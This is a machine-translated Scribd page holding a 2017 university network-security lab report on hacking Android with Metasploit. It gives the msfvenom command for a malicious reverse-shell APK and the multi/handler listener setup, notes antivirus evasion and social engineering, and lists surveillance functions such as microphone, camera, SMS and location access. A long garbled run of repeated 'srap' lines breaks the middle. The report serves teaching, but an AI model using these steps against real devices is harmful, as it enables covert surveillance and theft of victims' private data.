0% menganggap dokumen ini bermanfaat (0 suara)
3 tayangan6 halaman

Meng-hack Android dengan Metasploit

Dokumen ini menjelaskan cara meretas perangkat Android menggunakan Metasploit. Menjelaskan langkah-langkah untuk membuat file APK berbahaya dengan msfvenom yang mengimplementasikan payload Meterpreter terbalik untuk membangun sesi jarak jauh dari Kali. Kemudian, dijelaskan cara mengatur Metasploit di Kali untuk mendengarkan koneksi terbalik dan mendapatkan akses sistem jarak jauh ke perangkat Android setelah korban menjalankan APK berbahaya.

Diterjemahkan oleh

ScribdTranslations
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd
0% menganggap dokumen ini bermanfaat (0 suara)
3 tayangan6 halaman

Meng-hack Android dengan Metasploit

Dokumen ini menjelaskan cara meretas perangkat Android menggunakan Metasploit. Menjelaskan langkah-langkah untuk membuat file APK berbahaya dengan msfvenom yang mengimplementasikan payload Meterpreter terbalik untuk membangun sesi jarak jauh dari Kali. Kemudian, dijelaskan cara mengatur Metasploit di Kali untuk mendengarkan koneksi terbalik dan mendapatkan akses sistem jarak jauh ke perangkat Android setelah korban menjalankan APK berbahaya.

Diterjemahkan oleh

ScribdTranslations
Hak Cipta
© All Rights Reserved
Kami menangani hak cipta konten dengan serius. Jika Anda merasa konten ini milik Anda, ajukan klaim di sini.
Format Tersedia
Unduh sebagai PDF, TXT atau baca online di Scribd

Universitas Nasional Otonom Nikaragua

UNAN-LEÓN

Karir: Teknik sistem informasi.


Komponen: Pengenalan keamanan di jaringan
Meng-hack Android dengan Metasploit
Profesor: Dennis Espinoza
Kelompok: 1.
Tanggal: 12 Juli 2017.

Anggota
[Link]ía Narváez Argeñal.
[Link] Ángel Vallecillo Dávila

Ke kebebasan melalui Universitas!


Metasploit adalah proyek open source keamanan komputer yang menyediakan informasi
mengenai kerentanan keamanan dan sangat berguna selama pengujian penetrasi atau
pentesting. Proyek yang paling dikenal adalah Metasploit Framework, sebuah alat untuk
mengembangkan dan menjalankan eksploit (fragmen perangkat lunak, fragmen data atau urutan dari
perintah dan/atau tindakan yang digunakan dengan tujuan memanfaatkan kerentanan keamanan dari
sistem informasi) terhadap mesin jarak jauh. Fitur lain dari ini
alat adalah: basis data payload, alat untuk mengumpulkan informasi dan
memindai untuk mencari kerentanan.

Langkah-langkah dasar yang harus diikuti untuk mengeksploitasi kerentanan menggunakan Metasploit adalah:

Memilih dan mengonfigurasi eksploit (seperti yang telah kami katakan, kode yang memungkinkan mengeksploitasi)
kerentanan suatu sistem
Konfirmasi apakah tujuan dapat terpengaruh oleh eksploitasi yang dipilih (langkah ini bersifat opsional).
Pilih dan atur payload (kode yang dijalankan setelah kita mengeksploitasi
vulnerabilitas).
Pilih teknik encode atau pengkodean agar payload tidak terdeteksi
karena elemen keamanan perangkat (juga opsional meskipun
rekomendabel).
Jalankan eksploitasi.

Untuk pelaksanaan ini dan tindakan lainnya, Metasploit memasukkan yang berikut
alat

msfconsole: baris perintah Metasploit.


msfcli: antarmuka yang memungkinkan peluncuran modul tertentu melalui konfigurasinya
dalam eksekusi yang sama dari aplikasi.
msfgui:antarmuka grafis Metasploit.
msfd:layanan yang tetap mendengarkan untuk menerima koneksi guna menawarkan sebuah saluran
perintah jauh.
msfbinscan: memungkinkan pencarian pada file executable instruksi lompat,
petunjuk POP
msfpescan: memungkinkan untuk melakukan analisis terhadap DLL dan mendapatkan alamatnya
retorno yang diinginkan agar shellcode dapat dijalankan.
msfpayload: memungkinkan untuk menghasilkan payload dalam berbagai bahasa pemrograman,
dapat disematkan dalam executable Windows atau biner UNIX.
msfencode: memungkinkan untuk mengaburkan kode payload untuk menghindari deteksi.
msfvenom: adalah gabungan dari msfpayload dan msfencode.
msfupdate: digunakan untuk memperbarui framework.

Selain alat-alat ini, Metasploit terdiri dari berbagai modul. Ini


modul-modul adalah:
Modul auxiliar: memungkinkan interaksi dengan alat eksternal, seperti yang dapat
pemindai kerentanan, sniffer.
Modul encoder: menyediakan berbagai algoritma untuk mengkodekan dan
mengaburkan payload.
Modul eksploit: di sini terdapat semua eksploit yang tersedia di
kerangka kerja.
Modul payloads: banyak kode yang dijalankan setelah berhasil
mengeksploitasi.
Modul pos: fungsionalitas untuk fase pasca eksploitasi selama sebuah
pengujian penetrasi.
Modul nops: memungkinkan untuk melakukan atau memperoleh operasi nop.

Mengeksploitasi kerentanan Android.

Seperti yang diketahui publik, sistem operasi Android mencakup sekitar


pap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
srap
8
srap
s5rap
%
srap
srap
sras
menunjukkan beberapa serangan yang dapat dilakukan untuk meningkatkan kesadaran tentang
keamanan perangkat dan informasi yang diungkapkan seorang pengguna dalam
perangkat.

Dengan sepasang baris perintah sederhana dan sedikit rekayasa sosial kita bisa
mengakses perangkat Android.

KITA BUTUHKAN:

1.1 Mesin Virtual dengan KALI (kita akan menggunakan Metasploit)


2.1 Mesin Virtual dengan Android atau 1 Perangkat android

Kami membuat file berbahaya, untuk itu kami menggunakan MSFVENOM dari sebuah
terminal:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_KALI


LPORT=Puerto_KALI R > /Desktop/[Link]

-msfvenom adalah penggabungan dari msfpayload dan msfencode, msfpayload bertanggung jawab untuk
menghasilkan payload untuk berbagai platform, sementara msfencode menangani
untuk mendekode payload tersebut dengan tujuan menghindari deteksi melalui
penggunaan antivirus.

- Melalui bendera-pkami akan menentukan bahwa akan digunakan Payload yang mana
kami akan menyerang telepon target kami, dalam hal ini:meterpreter.

-Muatkan fungsi yang memiliki ancaman tertentu. Rujuk kepada


aksi tambahan, termasuk dalam virus, worm, dan trojan. Sebuah payload bukanlah
tidak selalu jahat, tetapi juga mengacu pada efek samping
berbahaya bagi komputer
- Hal berikut dalam perintah ini adalah memilih Stager (bertanggung jawab untuk
mengunduh sebuah payload (tahap), menyuntikkannya ke dalam memori, dan melewati
pelaksanaan pada dia.) untuk digunakan, dalam hal ini kami telah menggunakanreverse_tcp, yang kami
akan memungkinkan untuk memesan zona di memori dan melakukan koneksi. Di zona ini adalah
di mana Payload yang akan kita buat disimpan.

- LHOSTyLPORTson básicamente la ip y puerto donde recibiremos los datos


dikirim secara remote melalui telefon yang diserang. Port dapat dipilih
sendiri, dalam hal ini Port 443 dipilih secara acak.

- Akhirnya melalui benderaR > <tempat di mana kita akan menyimpan untuk
apk>/<nama apk>.apk,kami akan menjelaskan di mana akan dihosting
apk dan nama ini.

(Opsional)
msfvenom: Menunjukkan bahwa kita akan menggunakan Metasploit untuk serangan.
-p: Beri tahu msfvenom bahwa kita akan menggunakan payload.
android/meterpreter/reverse_tcp: Kami akan menggunakan meterpreter melalui sebuah
koneksi terbalik, ini berarti bahwa perangkat korbanlah yang akan membuka dengan
kami sebuah sesi di Meterpreter.
lhost: Menunjukkan host dari "Virus", dalam hal ini kami menunjukkan IP privat kami, yang
nos memberi kita Router untuk mengidentifikasi diri kita di dalam host.
lport: Ini adalah port yang akan kita gunakan untuk serangan, coba untuk tidak menggunakan port
biasanya digunakan sebagai 80,4444, karena mungkin sedang digunakan.

Dalam kasus kami akan seperti berikut.

Langkah selanjutnya adalah membiarkan 'mendengarkan' dari KALI sampai korban menjalankan
aplikasi, untuk itu kita membuka METASPLOIT dan mengonfigurasinya sebagai berikut
cara
msfconsole

gunakan exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST IP_KALI

set LPORT Puerto_KALI

eksploitasi

Dengan ini kita memiliki sesi Meterpreter yang terhubung ke korban kita, di sini
kasus dapat dilihat bahwa perintah "sysinfo"
Dengan perintah HELP kita bisa melihat tindakan apa yang bisa kita lakukan di
perangkat, banyak dari tindakan tersebut sudah dijelaskan di POST sebelumnya,
tetapi tindakan khusus Android adalah:

Merekam dengan Mikrophon


Mengambil Foto dengan kedua kamera (Depan dan Belakang)
Melakukan streaming dari kamera yang dipilih
Verifikasi apakah perangkat esROOTEADO
Mengambil daftar panggilan
Mendapatkan daftar Kontak
Dapatkan SMS
Mendapatkan Lokasi Perangkat
Kirim SMS
Antara lain hal-hal lainnya...

Anda mungkin juga menyukai